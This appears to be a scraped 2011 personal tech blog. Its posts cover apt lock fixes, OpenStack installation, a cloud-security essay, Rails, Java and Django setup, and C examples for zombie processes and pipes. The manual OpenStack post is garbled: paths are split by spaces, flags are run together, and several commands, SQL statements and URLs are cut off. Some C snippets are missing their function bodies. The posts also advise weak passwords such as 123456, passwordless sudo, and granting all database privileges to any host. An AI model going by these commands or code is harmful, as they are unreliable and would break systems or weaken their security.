Friday, December 16, 2011

E: Could not get lock /var/lib/apt/lists/lock - open (11: Resource temporarily unavailable),How to fix (Solved)

As a administer, newbie UNIX/Linux user ,or developer/programmer  , you face a problem like this in your shell/bash  in Ubuntu/Debian when any package is broken or due to any reason  your get lock /var/lib/dpkg/lock. or like below you face problem

root@pythongeek:~# apt-get update
E: Could not get lock /var/lib/apt/lists/lock - open (11: Resource temporarily unavailable)
E: Unable to lock directory /var/lib/apt/lists/
E: Could not get lock /var/lib/dpkg/lock - open (11: Resource temporarily unavailable)
E: Unable to lock the administration directory (/var/lib/dpkg/), is another process using it?

you can fix this problem in few steps without rebooting !!

1) type this in bash

    sudo dpkg --configure -a

2) type in bash

    sudo killall apt-get apt aptitude adept synaptic

your output like this

root@pythongeek:~# sudo killall apt-get apt aptitude adept synaptic
apt-get: no process found
apt: no process found
aptitude: no process found
adept: no process found
synaptic: no process foun

Note:if you face problem during installation of any software/package

don't forget accept EULA ,or accepting licensee of user agreement while you have pop-up during installation
3) this is final if you failed last to attempt to unlock
Close all running packages, and open a Konsole window.

type in bash

sudo rm /var/lib/dpkg/lock

then again type this bash

sudo dpkg --configure -a

for reinstallation type like this in bash

sudo apt-get  install -f  package  name here



LHS as a source of information – and a source of inspiration – I hope you’ll choose to act right now.enjoy keep learning.

Sunday, December 11, 2011

Installing openstack on Ubuntu using Devstack with ease in 15 min only (Cloud computing part 2)

Devstack script is a useful tools and good tutorial for us.

It help me know how to install openstack(nova, glance, keystone and so on) from git. And teach us how to config them and make them work fine together. Now using devstack script is very easy if you just want to set up an openstack environment for learning.

Remember you need not install mysql and anything else in advance it will automatically installed from script   

Make sure your system is 11.10 Ubuntu server
you can test it in your really machine or in your vmware or virtualbox desktop machine.

Make sure you open your virtualization switch in your BIOS setting.
you need have to two interfaces, ie eth0 and eth1
$ sudo apt-get install bridge-utils     # install birdge
$ vi /etc/network/interfaces
# The loopback network interface
auto lo
iface lo inet loopback

# The primary network interface
auto eth0
iface eth0 inet static

auto br100
iface br100 inet static
bridge_ports eth2
bridge_stp off
bridge_maxwait 0
bridge_fd 0

in this file, eth0 is your public network, you need it to connect to internet. eth2(maybe in your system is eth1) is another network interface used as a bridge(br100), is your private ip, it is not need connect to any other network in our test.just choose a private network like and remember.

$ sudo apt-get install git
$ git clone git://
$ cd devstack
$ vi localrc
add these info into localrc


$ ./stack

it will ask for some password, remeber don't use special characters like $*_.! and so on. you can simply set password like 123456
then it will begin install , how much it take depends on your network bandwidth. If it failed since of network or some reason. look at error log carefully, delete /opt/stack/devstack and run ./stack again.

At last, you will see successful information, and then you can type your IP in your browser. Enjoy your open-stack time and it is a good thing you need learning more and more. finally you are here .

Looking for Help/ Technical support  !

Feel free to mail me



LHS as a source of information – and a source of inspiration – I hope you’ll choose to act right now.enjoy keep learning.

Creating a Private Cloud using Openstack in Ubuntu Maually (Cloud Computing Part 1)

This article dedicated to developer ,project leaders , Cloud architects . I am gonna explain how to setup a cloud using command line .This useful for newbies to cloud and UNIX both !

I am using a Ubuntu 11.10 (64 bit server ), so lets play with shell !!

for setting up a prefect cloud you need minimum two network NIC on your hardware , a lot of public Ip . :)

But i am setting it on one network  it on one NIC hardware , with One IP (students and tester can with way those have less resources ) :)

We are setting up it with open-stack .
Official website of this document is below:

ubuntu 11.10 environment deployment, select the network mode FLATDHCP

public interface: eth0 used to connect to the user
private interface: eth1 do bridge br100, used, and other nodes, keystone, glance, volume and other connections

Minimum installed Ubuntu

Remember to open-ssh installed, where we have established a common user open-stack

Giving it the NOPASSWD sudo privileges, so easy to operate behind

$ Sudo apt-get update          //  (apt update about the tree)
$ Sudo apt-get install bridge-utils     //   (  installed bridge components )

Configure the network
$ vi / etc / network / interfaces      //(gksudo also can be used instead of vi for GUI Fans )

auto eth0
iface eth0 inet static

auto br100
iface br100 inet static
bridge_ports eth1
bridge_stp off
bridge_maxwait 0
bridge_fd 0

$ Sudo / etc / init.d / networking restart

Initial preparatory work to do, the next step is to install on nova, glance and other components

$ Sudo apt-get install-y rabbitmq-server  // (install the MQ message components )
$ Sudo apt-get install-y python-greenlet python-mysqldb     // (install Python dependencies )

Next, install the various nova components and dependencies

$ Sudo apt-get install nova-volume nova-vncproxy nova-api nova-ajax-console-proxy
$ Sudo apt-get install nova-doc nova-scheduler nova-objectstore
$ Sudo apt-get install nova-network nova-compute
$ Sudo apt-get install glance

Installation euca2ools and unzip
$ Sudo apt-get install-y euca2ools unzip

Next we install the database, I chose MYSQL, PostgreSQL actually personally feel better
$ Sudo su - to root user to change
# MYSQL_PASS = nova nova set mysql database password and the password
# NOVA_PASS = notnova here nova and notnova modified according to their definitions
# Cat <<MYSQL_PRESEED | debconf-set-selections
> Mysql-server-5.1 mysql-server/root_password password $ MYSQL_PASS
> Mysql-server-5.1 mysql-server/root_password_again password $ MYSQL_PASS
> Mysql-server-5.1 mysql-server/start_on_boot boolean true
# Apt-get install-y mysql-server
# Exit exit root environment

$ Sudo sed-i 's/' / etc / mysql / my.cnf modify my.cnf configuration file
$ Sudo service mysql restart

$ MYSQL_PASS = nova in the general user environment variable to the password once again set about
$ NOVA_PASS = notnova
$ Sudo mysql-uroot-p $ MYSQL_PASS-e 'CREATE DATABASE nova;'

// (to create a name for the ova of the database, I recommend that new users nova's name, if here for another name, then the configuration file in the nova which also need to change )
$ Sudo mysql-uroot-p $ MYSQL_PASS-e "GRANT ALL PRIVILEGES ON *.* TO
$ Sudo mysql-uroot-p $ MYSQL_PASS-e "SET PASSWORD FOR 'nova'@'%' =

This point. nova, glance of the installation completed, next is the configuration

nova configuration
$ Sudo vi / etc / nova / nova.conf
- Dhcpbridge_flagfile = / etc / nova / nova.conf
- Dhcpbridge = / usr / bin / nova-dhcpbridge
- Logdir = / var / log / nova
- State_path = / data / openstack / nova here / data / openstack / nova is a new volume and directory, make sure you have this, and the user should belong to nova
- Instances_path = / data / openstack / nova / instances to modify the default storage of instances where
- Lock_path = / var / lock / nova
- Force_dhcp_release = True
- Use_deprecated_auth
- Iscsi_helper = tgtadm
- Verbose
- Scheduler_driver = nova.scheduler.simple.SimpleScheduler
- Network_manager =
- My_ip = This is my ip address within the network
- Public_interface = eth0
# - Vlan_interface = eth0
- Sql_connection = mysql: / / nova: notnova @ localhost / nova
- Libvirt_type = kvm
# - Osapi_extensions_path = / opt / nova / bin / openstackx / extensions
# - Vncproxy_url =
# - Vncproxy_wwwroot = / data / stack / noVNC /
- Api_paste_config = / etc / nova / api-paste.ini
- Image_service = nova.image.glance.GlanceImageService
- Ec2_dmz_host =
- Ec2_url =
- Rabbit_host = localhost
- Glance_api_servers =
- Flat_network_bridge = br100
- Flat_interface = eth1
- Flat_network_dhcp_start = specified instances allocated from the beginning from the 51, but looks like this option does not work
- Fixed_range = This option specifies the instances of the network segment
- Flat_injected = False
- Multi_host = 1 using multi_host
- Libvirt_use_virtio_for_bridges instances using virtio network card model do
# - Start_guests_on_host_boot = true
# - Resume_guests_state_on_host_boot = true
- Use_ipv6 = false

$ Sudo vi / etc / glance / glance-api.conf
// (In this file without using keystone of the present case, according to your needs, modify filesystem_store_datadir parameter to specify the directory you need to store images, Dangran are the main users have Gaicheng glance )
$ Sudo vi / etc / glance / glance-registry.conf
// (This file can be selected to modify sql_connection parameter to specify your database. Of course you can not change.
If you want to modify, use mysql which database to ensure that the mysql which established a corresponding database )

sql_connection = mysql: / / nova: notnova @ localhost / glance this is my configuration, I created a glance in the mysql database

$ Sudo chown-R root: nova / etc / nova to change / etc / nova's owner
$ Sudo chmod 640 / etc / nova / nova.conf

Restart all services
$ Sudo restart libvirt-bin
$ Sudo restart nova-network
$ Sudo restart nova-compute
$ Sudo restart nova-api
$ Sudo restart nova-objectstore
$ Sudo restart nova-scheduler
$ Sudo restart glance-registry
$ Sudo restart glance-api
Note: We do not have from the nova-volume, because although we installed the volume, but the volume needs to use a separate vg, we have not configure the volume, so get up.

There may be network services and can not compute it, do not worry about being first

Next, we do configure the operating environment of the nova
$ Sudo nova-manage db sync
nova-manage user admin <user_name> where we can create a user, such as
$ Sudo nova-manage user admin test, create a successful return on the screen like:
export EC2_ACCESS_KEY = d6aa7747-4324-4abc-9604-4f7d6a2f8f3f
export EC2_SECRET_KEY = 2b204b75-da2d-47b8-ba7a-611d71f0ecbf

nova-manage project create <project_name> <user_name> create a project, we built that are just users, such as:
$ Sudo nova-manage project create test-proj test
nova-manage network create - help create an instance of the network, such as:
$ Sudo nova-manage network create - label = test-net - fixed_range_v4 = - num_network = 1 - network_size = 256

Services have failed to start again
$ Sudo start nova-network
$ Sudo start nova-compute
$ Sudo start nova-scheduler
In addition, since each service, the best look at the log, such as sudo tail-f / var / log / nova / nova-network to determine there is no error, you can also use the ps aux | grep [n] ova-network to confirm the service is not open. If the starting service fails, you confirm that a good reason to modify a good future, need to use sudo start to play instead of sudo restart

Well. This computing environment, we deployed the. We can look at the state command
$ Sudo nova-manage service list
$ Sudo nova-manage network list

Next, create a certificate, to facilitate the tool we use euca
$ Cd
$ Mkdir creds
$ Sudo nova-manage project zipfile test-proj test creds /
$ Unzip creds / creds /
$ Source creds / novarc

OK, done, we can use the tool to look at
$ Euca-describe-availability-zones verbose
VAILABILITYZONE nova available
AVAILABILITYZONE | | - Nova-network enabled :-) 2011-10-17 04:45:44
AVAILABILITYZONE | | - Nova-compute enabled :-) 2011-10-17 04:45:45
AVAILABILITYZONE | | - Nova-scheduler enabled :-) 2011-10-17 04:45:46

So far, successfully enabled services. When you find that service is not working, use ps aux | grep nova check services are not open, and the need for detailed observations / var / log / nova / directory log files for each service, in order to obtain further information.

Then we can use kvm to create a mirror image

$ Sudo apt-get install kvm-pxe installation about this, otherwise there will be time to run kvm warning
$ Kvm-img create-f raw server.img 5G
$ Sudo kvm-m 1024-cdrom rhel5.iso-drive file = server.img, if = virtio, index = 0-boot d-net nic-net user-nographic-vnc: 0

Here we use rhel5(Redhat) the iso, after running this command, you can use vnc to connect the machine to connect to your server: ssvncviewer 0
Open vnc you can see the installation interface After the installation, the following paragraph written rhel mirror / etc / rc.local the beginning of the
modprobe acpiphp

# Simple attempt to get the user ssh key using the meta-data service
mkdir-p / root / .ssh
echo>> / root / .ssh / authorized_keys
curl-m 10-s | grep 'ssh-rsa'>> / root / .ssh / authorized_keys
echo "************************"
cat / root / .ssh / authorized_keys
echo "************************"
Save and exit, so that image on the well

Upload images using glance
$ Glance - verbose add name = "rhel5" disk_format = raw is_public = true <server.img
You should also observe the / var / log / glance / registry and the log api
$ Glance index to see a list of mirrors

Start your instance
$ Euca-describe-images
You can now view the image, output similar to the
IMAGE ami-00000003 server.img
Remember this image here ami-000000003 No.
$ Euca-run-instances-t m1.tiny ami-00000003 start an instance of ami-00000003 image
-T specifies the type of instance, provides the type of cpu, memory, disk size, etc..
Watch / var / log / nova / nova-api.log nova-scheduler.log, nova-compute, nova-network.log of output, but you can also use vnc to connect serverip: 0 look at the console instance
With the command $ euca-describe-instances to see your current instance of the first instance will be relatively slow start because of the need to copy the image from a glance under the instance directory to the nova

Conclusion As the nova is currently growing fast, diablo release version of the function of some of the requirements to be completed daily. But the development version of the nova can be better combined with keystone, novaclient, dashboard and some other projects. Makes openstack more robust. Friends who are interested, you can use in a production environment repo's installation, test development versions of the test environment. Since I use in a production environment install git development version. Therefore, a more complete integration of follow-up, I will develop versions of the form. Of course, using the development version, then there will be more trouble, but also have more fun and hands-on practice, to further understand the mechanism of its working principle.

Looking for help /technical support  !

Feel free to mail me



LHS as a source of information – and a source of inspiration – I hope you’ll choose to act right now.enjoy keep learning.


Sunday, November 20, 2011


Even though the cloud continues to grow in popularity and respectability, complications with data privacy and data protection still plague the market.There's a long way to go before cloud becomes mainstream ,Obstacles on the road to cloud computing.Data security is a concern for any enterprise, and cloud computing often can magnify security anxieties. Adopting a few ground rules will help protect users, their data and your overall cloud investment

Everywhere the acceptance of cloud computing by corporate, now one of the fastest emerging technology in field of Information Technology (IT). From startup to experienced companies often lack of protection measure to weather off an attack on their servers due to scarcity of resources:
  • Due to poor programming skills that explores software vulnerabilities in Python, Ruby, PhP, JavaScript.
  • Even some good programmers aren't aware about Cyber security so Companies need hybrid developers (security + good programmers)
  • Open ports to firewalls or insufficient knowledge of security by system administrator, Knowledge of Nmap. Nessues, Snort must be mendentory for system administrator before hiring them for cloud based firms.
  • Those companies are encouraged to pursue cloud computing must have need to support their own hardware backbone.

Due to Ineffective Security Policies many of startup or firms afraid to adopt cloud computing. But there is solution how Rescue security in cloud their are above 4 point must be remembered by companies when they gonna to hire guys for their cloud operations.


Basic Definition of Information security have 3 aspects according to our Corporate world refers as confidentiality, integrity and availability, these are major security issue for cloud vendors.

Confidentiality refers that who stores the encryption key is must be secure from users, employees only permitted to respected officials whose are responsible for operation.

Integrity refers every firms must need to have some policies for no data exchange without strict set of rules or protocols. Must be aware from client side don't store sensitive data and password those can be stolen easily.

Availability, this is one major concern by security experts, many of large caps in cloud computing have already experienced downtime. There must be relationship only among clients and provider, no third parties. Also need to focus on protocols to increase security during authentication should backed several methods using combination of hardware and password, or including face rectification of face, figure prints. Because SSL is also hacked by some hackers so need to focus on these protocols. Even Amazon faced denial of service attack.

Untrustworthy supplier, eavesdropping, impersonation, data theft, lack of performance and logical and physical disasters are addressed by this pattern. Consider checking supplier applications for Cross-site scripting (XSS) attacks which can be used to log keystrokes and capture data, and propagate web application worms such as Samy. Feed injection for RSS and Atom can allow an attacker to compromise applications, if feeds are not properly secured

All programmer must need to go through some Relevant Technologies those are safer than other such Django in python, AJAX, RSS, JSON, Gears in JAVA, SOAP (Simple object access Protocol), REST (Representational State Transfer)


Information privacy is the interest an individual has in controlling or at-least significantly influencing, the handling of data about themselves. Need to ensure data among only the clients and provider only but how?

  • Need to insure security of MapReduce for privacy and confidentiality using Airavat our main aim here to provide assurances privacy for sensitive data
  • Using System Model such as data provider have their own set of data, cloud provider need to use Airavat Framework.
  • Trustworthiness of data provider using a Threat Model
  • Computation Model of MapReduce must be deployed into input chunks so that mapper and reducer so that set of the input and output can have separate function and chunks
  • Differential privacy concept can used to ensure privacy and Random Laplacian noise, other noise algorithm can be used or implemented during designing.
  • Functional Sensitivity algorithm can be used during designing of model for cloud architecture, some new policies such as use of SELinux and MAC model for key architecture of any cloud access control.
  • In case must concern over such as Security (OpenID,. Net Access Control, PKI), and Load Monitoring and Testing (Soasta, Hyperic), Provisioning and Configuration Management.

Basic Network Security refers performance, bandwidth, quality, availability, more flexibility over the networks. Reconfiguration of network according to clients such as Network as a Service (NaaS)
and virtualization of cloud network to users

  • Provide the basic network functions for applications with highly variable demands according.
  • Integrating functionality with computing and storage with variable demands during seasons with peak requirement
  • Integration of necessary tools for management and security such as Snort, Nmap, Tcpdump ... etc


Security as a service can be used to ensure security in cloud. Need to run anti-virus on both side of cloud on vendor and client side, multi-version of anti-virus can be used for ensuring proper security from malware.

  • Reduce possibility number of bugs, contribute to open-source so can benefited from community.
  • Multiple Functionality equivalent programmers independently, use multiple scanner's in parallel to increase detection rate
  • Use cloud forensics also go trough with no-vendor lock in service for better productivity so that
    clients never agnostic with vendor service

  • Need to improve system Architecture, include specific protocols on both side for the end-users
    and use hash technique to extract unique id of host and user using MAC.

  • Certification and 3 rd party audits is provider is certified.


Despite the numerous security involved with cloud computing, it is critical that industry ans organization taking a thoughtful and proactive approach to cloud. So as we need it as basic utility in our in daily uses so we need to insure security in cloud. There are following suggestion are provided here to ensure security of your cloud

  • Secure Architecture Model such need to integrated applications, for security architecture community. Some important entities involved in the data flow are end users, developers, system architect, Auditors. Need to integrate all application level tool inside architecture so that we can use the grid concept of security with step by step.
  • End Uses: Use certain protocol and policies those committed to ensure security while they are accessing resources from cloud. Need to use signatures and token on server side and on client side must need to use firewalls, entry point protocols, need to update regularly so that can patch bugs as soon as possible. Also need to ensure security using TSL, SSL, using Secure IPSEC.
  • System Architects: These Guys must employed using some certain policies should have knowledge of basic security concepts and tools that are need to use to prevention of cloud. They also need to write policies that pertain to installation and configuration of hardware components such as Firewalls, Servers, Routers, Operating systems, Proxy server configurations and encryption tunnels
  • Developers: Developers must need to gone through with security concepts. They may desire extra virtual machines to either generate test data or to perform data analysis, processes and penetrate their code. Monitoring of API call for the server requests for software must be include inside the architectural model




LHS as a source of information – and a source of inspiration – I hope you’ll choose to act right now.enjoy keep learning.

Sunday, October 2, 2011

Setting up your first Rails project on Ubuntu 11.04

Installing  from Terminal
sudo apt-get install ruby-full
tar -xvf rubygems-1.3.7.tgz
cd rubygems-1.3.7/
sudo ruby setup.rb
sudo ln -s /usr/bin/gem1.8 /usr/bin/gem
sudo gem install rdoc
sudo gem install rails

Looking for Ruby 1.9.2
I recommended above version 1.8 but if anybody looking for 1.92 you install following :) yeah  

$ sudo apt-get install curl bison build-essential autoconf zlib1g-dev \
    libssl-dev libxml2-dev libreadline6-dev git-core subversion
$ rvm package install openssl
$ rvm package install readline
$ rvm install 1.9.2 -C --with-openssl-dir=$HOME/.rvm/usr,--with-readline-dir=$HOME/.rvm/usr

Installing MySQL Server from Terminal
sudo apt-get install mysql-server libmysqlclient-dev libmysql-ruby
Setting up your first Rails project
It seems that Rails 3 depends on sqlite3 even if you don’t intend to use it as the backend for your application. We’ll create an example rails project  to make sure everything is working.
sudo apt-get install libsqlite3-dev build-essential
rails new vikas
cd vikas/
 sudo bundle install
sudo rake db:create
rails s
you go to rake db:create you have such kind problem that i face

 sudo rake db:create
rake aborted!
Could not find a JavaScript runtime. See for a list of available runtimes.

So no need to worry just install node.js using Terminal
sudo apt-get install python-software-properties
sudo add-apt-repository ppa:chris-lea/node.js
sudo apt-get update
sudo apt-get install nodejs

same kind problem also with "heroku with ruby"so Just need to install node.js
like above
Now fire up your browser, and go to http://localhost:3000 and you should be greeted with a nice little rails homepage  

Sunday, September 25, 2011

how to install Unetbootin , Default Java Jdk on Ubuntu , Debian ..Thing's you can't find on the Google

If you are a programmer And Looking For a portable solution for the Live system installation for any Linux you need Unetbootin to install them on   Usb  , I also Try a lot on Google these Things I thought That why should i have to mention it on My blog for my Friends

For Ubuntu 9.10 and higher
Go to Command Terminal to install UNetbootin from PPA:
sudo add-apt-repository ppa:gezakovacs/ppa
sudo apt-get update
sudo apt-get install unetbootin
Java jdk is Recommended for if you are using Hadoop or Eclipse or any kind of Java application It helps to build an environment and in increase in Performance so For Developer , Coder, Programmers , Hackers  I just write blog for how install it on Ubuntu make it default  For  Ubuntu 11.04 or  In Ubuntu 10.04 LTS, the package sun-java6-jdk has been dropped from the Multiverse section of the Ubuntu archive. You have to perform the following four steps to install the package.
1. Add the Canonical Partner Repository to your apt repositories:
$ sudo add-apt-repository "deb lucid partner" 2. Update the source list
$ sudo apt-get update 3. Install sun-java6-jdk
$ sudo apt-get install sun-java6-jdk 4. Select Sun’s Java as the default on your machine.
$ sudo update-java-alternatives -s java-6-sun The full JDK which will be placed in /usr/lib/jvm/java-6-sun (well, this directory is actually a symlink on Ubuntu).
After installation, make a quick check whether Sun’s JDK is correctly set up:
user@ubuntu:~# java -version java version "1.6.0_20" Java(TM) SE Runtime Environment (build 1.6.0_20-b02) Java HotSpot(TM) Client VM (build 16.3-b01, mixed mode, sharing)

Thursday, August 18, 2011

TDD and Pair Programming :- A New Industry approach to better productivity & performance

A new concept of pair programming and TDD comes into approaching cyber professionals now these days to into industry.

1) what is TDD and Pair Programming ?
Tdd is test driven development and pair programming is pairing of two or more two programmer on a same machine , it  Can help to increase your productivity and performance .

2) Why TDD and Pair programming?
1) It increases  motivation to develop  individual programming skills .
2) After requiring this , they  can  demonstrate their skills under controlled exam-like conditions
3)It   provide an accurate gauge and practical Implementation  of individual programming ability.
4)It also help Professionals to use presents a valuable assessment too
5) It increases productivity and performance of an individual

Looking for a  lab session link so there are some university lab session link help you a lot



3) For Agile Software Development or for specially for ruby

4)For specially for JavaScript or Dojo

Some more Documentation links For understanding  and  Implementing It into your University ,Company ,Organization,Firm




Braught, G., Eby, L. & Wahls, T. (2008). The Effects of Pair-Programming on Individual Programming Skills. In Proceedings of the thirty ninth ACM-SIGCSE Technical Symposium on Computer Science Education. (pp. 200-204). (Also appears in: ACM SIGCSE Bulletin, 40(1), 200-204.)

Braught, G. & Wahls, T. (2008). Teaching Objects in Context. Journal of Computing Sciences in Colleges, 23(5), 101-109.

Braught, G., Wahls, T. and Ziantz, L. (2007). Assessing The Effects of Pair-Programming on Individual Ability: Results from the First Year of a Two-Year Study. Faculty Poster Session, The thirty eighth ACM-SIGCSE Technical Symposium on Computer Science Education. Covington KY, March 7-10, 2007.

G. Braught, T. Wahls & Ziantz, L. Integration and Assessment of Pair Programming, Unit Testing and Lab Practica in an Introductory Computer Science Course. NSF CCLI Showcase at SIGCSE07, Covington, KY, March 7-10, 2007.

Monday, May 16, 2011

CS 201 Python/Django Summer 2011

Vikash   Ruhil
11am to 5pm
Room No 1
School of Computer and System Sciences
JNU NEW Campus
How to Reach

By  Delhi Metro:- Hauz khas Merto station
(Jnu is about 1 Km from Hauz khas Metro station )
vikasruhil06 at


30th July 2011(1 day boot camp)
1)come with your laptop
2)better if have Linux/Mac as OS
3) for window no more support after bootcamp
4) training is free but no other services provided i.e food come ready with your own
5)Also send me mail about your confirmation with your  short Bio & why you want attend, why to want learn django !
6)6)Please bring your printed mail copy of our sent confirmation so that we ensure your space over-there
7) so meet @Jnu

1)Django introduction Basic concept
2) Web development (django vs wep2py , who is better)
3)   Google app engine
4)  Creating Facebook app  using GAE +django
5) Web server set up & usage
6) Database setup & usage
7)  ORM (Object Relational Mapping) + Templates
 (for views) + Forms + Much more
some updations soon
Course mailing list : A list server is used to email important messages to students in the course .      soon coming !.
Other Prerequisites: Graduate standing, ability to install software, learn material quickly and find solution to problems,read following resources to get updated

What's django

● “Django is a high-level Python Web framework
that encourages rapid development and clean,
pragmatic design.”
● DRY (Don't Repeat Yourself)
● ORM (Object Relational Mapping) + Templates
(for views) + Forms + Much more

Getting Started

Before using Django you need to be sure Python is installed. Django works with any version of Python between 2.4 and 2.7. If you followed the directions for ps6 and installed Python, you are already set for this. Otherwise, follow the directions in the Python Guide to install Python first. Installing Django on Windows
  1. Download and install 7-Zip (or some other zip utility that supports tar files such as WinZip)
  2. Download Django 1.1:
  3. Unpackage the Django tarball file. If you have WinZip, this should happen automatically when you open the downloaded file. If you have installed 7-Zip, start the 7-Zip file manager and select the Django-1.1.1.tar.gz file you downloaded. Then, select "Extract" and select the directory where you want to extract the files.
  4. Open a Windows Command Shell and go to the unzipped folder. You can open the command shell by running "cmd.exe" or by selecting "All Programs | Accessories | Command Prompt" from the Start menu. Once you have the command shell, assuming that the folder was extracted to your desktop the command to use is:
    in Windows XP: cd C:\Documents and Settings\[username]\Desktop\Django-1.1.1
    in Windows Vista: cd C:\Users\[username]\Desktop\Django-1.1.1
    where [username] is your personal folder.
  5. Run the command: python install [If you get errors for this, Mail me !.]
  6. Django is now installed!
Installing Django on Mac
  1. Download Django 1.1:
  2. Double-click the Django tarball file. This should automatically unzip the file. Place the file on your desktop for simplicity.
  3. Open your "Terminal". This is similar to "Run" on a Windows PC. At the command line, type the following command and hit enter: cd /Users/[YOUR_NAME]/Desktop/Django-1.1.1
  4. Type the following command: sudo python install. You will be required to enter your password. When you type your password, your keystrokes will be recorded but will not appear in the Terminal. Type your password CAREFULLY and then hit enter.
  5. Django is now installed!

    Frequently Asked Questions
  6. How do I run a Windows command shell? In 7, select the Start menu and enter "cmd.exe" in the Search box.
    In other versions of Windows, select "Start | All Programs | Accessories" and select "Command Prompt".
  7. How do I run python? When I try to run python, I get an error like:
    ] python install
    'python' is not recognized as an internal or external command,
    operable program or batch file.
    The problem is python is not on your Windows command path. To add the Python directory to your Windows path, open the Control Panel and select System and "Advanced System settings". Select "Environment Variables". Edit the "Path" variable to add the directory containing python. For example, if the current value of "Path" is
    C:\Program Files (x86)\CVSNT\;C:\Program Files(x86)\texlive\2008\\bin\win32
    and you installed Python in C:\Python26, edit the "Path" variable value to be:
    C:\Program Files (x86)\CVSNT\;C:\Program Files(x86)\texlive\2008\\bin\win32;C:\Python26
    An easier (temporary) workaround for this, is to just type the full path to run python:
    ] C:\Python26\python install
  8. How should I read in data from a file? If the data in your file is separated into lines, and the elements in each entry separated by commas (this is what is known as a "comma-separated values" or csv file), the easy way to read in the data is:
    f = open (filename, 'r')
        for line in f:
           entries = line.split(",") 
           ### entries is now a Python list of the elements in that line
    If you have data to pre-seed your database with, it is a good idea to store it in a file and use code like this to read it in. Then, from the entries you would need to construct the relevant model object and save() it to store it in the database.

Django and Python development online and printed resources



Editors and IDEs

Web server setups

Database setups

Templating Engines


Example Django applications

There is a lot of open source Django code available online. Reading the source of established Django projects can be a great way to learn more about the framework. Our recommended starting points include:

Google App Engine

Google App Engine Helper for Django

Online Videos


General Documentation




Testing and Documentation Tools



Web Servers and Modules



Text Formatting


Web browsers

Revision control

Issue Tracking

Text editors

JavaScript Libraries

JavaScript Object Notation (JSON)

Source Code Syntax Highlighters

Test tools



Python Books

Reference (these books freely distributed during the course-ware studies )

  • Python Phrasebook
    • Brad Dayley, Sams, 2006
  • Python in a Nutshell, 2nd ed.
    • Alex Martelli, O'Reilly, 2006
  • Python Essential Reference, 3rd ed.
    • David M. Beazley, Sams, 2006
  • Python Cookbook, 2nd ed.
    • (ed.) A. Martelli, A. Ravenscroft, D. Ascher, O'Reilly, 2005
  • Python Pocket Reference, 3rd ed.
    • Mark Lutz, O'Reilly, 2005

Saturday, April 30, 2011

how to kill zombie (Bots) ?

What is zombie?
A zombie computer (often shortened as zombie) is a computer connected to the Internet that has been compromised by a cracker, computer virus or trojan horse and can be used to perform malicious tasks of one sort or another under remote direction.The spammer controls and uses your pc without you knowing it. Spammers may be using your computer to send unsolicited — and possibly offensive — email offers for products and services. Spammers are using home computers to send bulk emails by the millions. The Zombie is planted on hundreds of computers belonging to unsuspecting third parties and then used to spread E-mail spam and because of this it becomes very difficult to Trace the zombie’s creator. Zombies can also be used to launch mass attack on any company or website


Killing Zombies
Recall that if a child dies before its parent calls wait, the child becomes a zombie. In some applications, a web server for example, the parent forks off lots of children but doesn't care whether the child is dead or alive. For example, a web server might fork a new process to handle each connection, and each child dies when the client breaks the connection. Such an application is at risk of producing many zombies, and zombies can clog up the process table.
When a child dies, it sends a SIGCHLD signal to its parent. The parent process can prevent zombies from being created by creating a signal handler routine for SIGCHLD which calls wait whenever it receives a SIGCHLD signal. There is no danger that this will cause the parent to block because it would only call wait when it knows that a child has just died.
There are several versions of wait on a Unix system. The system call waitpid has this prototype

#include <sys/types.h>
#include <sys/wait.h>

pid_t waitpid(pid_t pid, int *stat_loc, int options)
This will function like wait in that it waits for a child to terminate, but this function allows the process to wait for a particular child by setting its first argument to the pid that we want to wait for. However, that is not our interest here. If the first argument is set to zero, it will wait for any child to terminate, just like wait. However, the third argument can be set to WNOHANG. This will cause the function to return immediately if there are no dead children. It is customary to use this function rather than wait in the signal handler. Here is some sample code

#include <sys/types.h>
#include <stdio.h>
#include <signal.h>
#include <wait.h>
#include <unistd.h>

void *zombiekiller(int n)
  int status;
  return (void *) NULL;
int main()
  signal(SIGCHLD, zombiekiller);


Note: this topic does not real fit with the other lessons of the week, but you will need it for the exercise.
A second form of redirection is a pipe. A pipe is a connection between two processes in which one process writes data to the pipe and the other reads from the pipe. Thus, it allows one process to pass data to another process.
The Unix system call to create a pipe is
int pipe(int fd[2])
This function takes an array of two ints (file descriptors) as an argument. It creates a pipe with fd[0] at one end and fd[1] at the other. Reading from the pipe and writing to the pipe are done with the read and write calls that you have seen and used before. Although both ends are opened for both reading and writing, by convention a process writes to fd[1] and reads from fd[0]. Pipes only make sense if the process calls fork after creating the pipe. Each process should close the end of the pipe that it is not using. Here is a simple example in which a child sends a message to its parent through a pipe.

#include <unistd.h>
#include <stdio.h>

int main()
  pid_t pid;
  int retval;
  int fd[2];
  int n;

  retval = pipe(fd);
  if (retval < 0) {
    printf("Pipe failed\n"); /* pipe is unlikely to fail */

  pid = fork();
  if (pid == 0) { /* child */
    n = write (fd[1],"Hello from the child",20);
  else if (pid > 0) { /* parent */
    char buffer[64];
    n = read(fd[0],buffer,64);
    printf("I got your message: %s\n",buffer);
  return 0;
There is no need for the parent to wait for the child to finish because reading from a pipe will block until there is something in the pipe to read. If the parent runs first, it will try to execute the read statement, and will immediately block because there is nothing in the pipe. After the child writes a message to the pipe, the parent will wake up. Pipes have a fixed size (often 4096 bytes) and if a process tries to write to a pipe which is full, the write will block until a process reads some data from the pipe.
Here is a program which combines dup2 and pipe to redirect the output of the ls process to the input of the more process as would be the case if the user typed
ls | more
at the Unix command line.
#include <stdio.h>
#include <unistd.h>

void error(char *msg)

int main()
    int p[2], retval;
    retval = pipe(p);
    if (retval < 0) error("pipe");
    if (retval < 0) error("forking");
    if (retval==0) { /* child */
          dup2(p[1],1); /* redirect stdout to pipe */
          close(p[0]);  /* don't permit this 
                process to read from pipe */
          error("Exec of ls");
    /* if we get here, we are the parent */ 
     dup2(p[0],0);  /* redirect stdin to pipe */
     close(p[1]);  /* don't permit this 
                  process to write to pipe */
     error("Exec of more");
     return 0;

There is a variant of deadlock called livelock. This is a situation in which two or more processes continuously change their state in response to changes in the other process(es) without doing any useful work. This is similar to deadlock in that no progress is made but differs in that neither process is blocked or waiting for anything.
A human example of livelock would be two people who meet face-to-face in a corridor and each moves aside to let the other pass, but they end up swaying from side to side without making any progress because they always move the same way at the same time.
Addressing deadlock in real systems
Deadlock is a terrific theoretical problem for graduate students, but none of the solutions discussed above can be implemented in a real world, general purpose operating system. It would be difficult to require a user program to make requests for resources in a certain way or in a certain order. As a result, most operating systems use the ostrich algorithm.
Some specialized systems have deadlock avoidance/prevention mechanisms. For example, many database operations involve locking several records, and this can result in deadlock, so database software often has a deadlock prevention algorithm.
